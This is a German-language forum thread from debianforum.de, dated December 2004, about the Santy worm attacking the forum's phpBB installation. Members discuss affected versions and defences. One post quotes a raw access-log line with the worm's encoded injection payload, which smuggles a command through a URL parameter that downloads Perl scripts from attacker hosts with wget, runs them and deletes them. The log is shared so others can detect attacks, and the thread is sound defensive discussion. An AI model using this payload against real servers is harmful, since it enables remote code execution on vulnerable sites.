Santy-Wurm ist aktiv

Neues rund um debianforum.de
Benutzeravatar
feltel
Webmaster
Beiträge: 9806
Registriert: 20.12.2001 13:08:23
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: Leipzig, Germany
Kontaktdaten:

Santy-Wurm ist aktiv

Beitrag von feltel » 26.12.2004 15:39:46

Wie ihr eventuell bemerkt habt hat unser Forum zur Zeit sehr viele Gastbesucher [1] (im Schnitt 100-150), was nicht dem normalen Schnitt an Besuchern entspricht. Dies kommt daher das unser Server momentan massiv von mit dem Santy-Wurm [2] infizierten Rechnern "angegriffen wird". Wir haben alle erdenklichen Schutzmaßnahmen getroffen um eine Infektion unseres Servers auszuschließen. Sobald wir mehr wissen und/oder die Angriffe abebben gibts hier neue Infos.

[1] http://www.debianforum.de/forum/viewonline.php
[2] http://www.heise.de/newsticker/meldung/54623

floschi
Beiträge: 791
Registriert: 17.09.2002 14:36:18
Wohnort: München
Kontaktdaten:

Beitrag von floschi » 26.12.2004 16:39:49


Benutzeravatar
feltel
Webmaster
Beiträge: 9806
Registriert: 20.12.2001 13:08:23
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: Leipzig, Germany
Kontaktdaten:

Beitrag von feltel » 26.12.2004 16:44:23

Haben wir drin bin auf den Redirect nach localhost. Gute Idee :-)

gucki
Beiträge: 338
Registriert: 15.03.2004 09:15:49

Beitrag von gucki » 27.12.2004 10:15:39

hi feltel,

mich würde mal nee access_log Zeile von einem Zugriff des Wurms interessieren. Ich würde gern unseren Rootie auch untersuchen ob da scho Angriffe laufen. Kommt er immer mit ".....visualcoders..." daher?

Danke Gucki

Benutzeravatar
KBDCALLS
Moderator
Beiträge: 22107
Registriert: 24.12.2003 21:26:55
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: Dortmund
Kontaktdaten:

Beitrag von KBDCALLS » 27.12.2004 10:40:24

Nach Heise gibt es schon Varianten von diesem Wurm.
Was haben Windows und ein Uboot gemeinsam?
Kaum macht man ein Fenster auf, gehen die Probleme los.

EDV ist die Abkürzung für: Ende der Vernunft

Bevor du einen Beitrag postest:
  • Kennst du unsere Verhaltensregeln
  • Lange Codezeilen/Logs gehören nach NoPaste, in Deinen Beitrag dann der passende Link dazu.

Benutzeravatar
feltel
Webmaster
Beiträge: 9806
Registriert: 20.12.2001 13:08:23
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: Leipzig, Germany
Kontaktdaten:

Beitrag von feltel » 27.12.2004 14:45:32

Code: Alles auswählen

GET /forum/viewtopic.php?t=8481&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20
cd%20/var/tmp;wget%20www.h4ck3rsbr.net/Virus.txt;perl%20Virus.txt;wget%20locais.v10.com.br/wor;
perl%20wor;rm%20-rf%20wor*;rm%20-rf%20Virus*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&
highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56
%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 36661 "-" "LWP::Simple/5.803
Die Hostnames variieren.

Benutzeravatar
Crack02
Beiträge: 68
Registriert: 27.12.2004 14:13:56

Beitrag von Crack02 » 27.12.2004 15:50:22

ist das dieser virus der alle phpbb versionen 2.0.10 abwärts lahmlegt?

Benutzeravatar
blackm
Moderator und Co-Admin
Beiträge: 5918
Registriert: 02.06.2002 15:03:17
Lizenz eigener Beiträge: MIT Lizenz

Beitrag von blackm » 27.12.2004 15:53:01

Ja, das ist er. Es hat auch schon jemand [1] berichtet das phpbb 2.0.11 auch betroffen ist.

by, Martin

[1] http://lists.netsys.com/pipermail/full- ... 30279.html
Schöne Grüße

Martin

Neu im Forum? --> https://wiki.debianforum.de/debianforum ... tensregeln
Log- und Konfigurationsdatein? --> pastebin.php
Forum unterstützen? --> https://wiki.debianforum.de/debianforum.de/Spenden

Benutzeravatar
Crack02
Beiträge: 68
Registriert: 27.12.2004 14:13:56

Beitrag von Crack02 » 27.12.2004 15:54:04

ouch das ist hart. wie kamma sowas gehen phpbb schreiben. die sollten lieber viren gegen wbb2 oder vb schreiben. geldmacherei.

Benutzeravatar
feltel
Webmaster
Beiträge: 9806
Registriert: 20.12.2001 13:08:23
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: Leipzig, Germany
Kontaktdaten:

Beitrag von feltel » 27.12.2004 15:55:36

blackm hat geschrieben:Ja, das ist er. Es hat auch schon jemand [1] berichtet das phpbb 2.0.11 auch betroffen ist.
Laut unbestätigten Kommentaren auf verschiedenen Websites soll das aber nur dann so sein wenn phpBB 2.0.11 auf einem ungepatchten PHP läuft.

Benutzeravatar
HELLinG3R
Beiträge: 1328
Registriert: 15.04.2004 07:54:33

Beitrag von HELLinG3R » 28.12.2004 08:56:48

hm, was passiert, wenn kein wget installiert ist? garnichts?

Benutzeravatar
feltel
Webmaster
Beiträge: 9806
Registriert: 20.12.2001 13:08:23
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: Leipzig, Germany
Kontaktdaten:

Beitrag von feltel » 28.12.2004 08:58:11

So siehts wohl aus.

Tomek
Beiträge: 254
Registriert: 07.08.2004 10:48:37
Wohnort: Paderborn

Beitrag von Tomek » 28.12.2004 14:39:53

Crack02 hat geschrieben:ouch das ist hart. wie kamma sowas gehen phpbb schreiben. die sollten lieber viren gegen wbb2 oder vb schreiben. geldmacherei.
Wieso sollte man Viren gegen wbb2 oder vb schreiben? Weil sie Geld für Software verlangen?

Solche Aktionen sind generell abzulehnen.
Gruß,
Tomek

Benutzeravatar
KBDCALLS
Moderator
Beiträge: 22107
Registriert: 24.12.2003 21:26:55
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: Dortmund
Kontaktdaten:

Beitrag von KBDCALLS » 28.12.2004 14:49:32

Es ist doch schon krankhaft das sich Leute übehaupt ein Spaß daraus machen andere zu schädigen.
Was haben Windows und ein Uboot gemeinsam?
Kaum macht man ein Fenster auf, gehen die Probleme los.

EDV ist die Abkürzung für: Ende der Vernunft

Bevor du einen Beitrag postest:
  • Kennst du unsere Verhaltensregeln
  • Lange Codezeilen/Logs gehören nach NoPaste, in Deinen Beitrag dann der passende Link dazu.

Benutzeravatar
Crack02
Beiträge: 68
Registriert: 27.12.2004 14:13:56

Beitrag von Crack02 » 28.12.2004 15:19:18

ich mach ja keine hetzjagd gegen leute die geld für ihre coderei verlangen, aber ...es lebe Open Source :) (ok wbb und vb sind im gewissen sinne auch open source ;) )

Antworten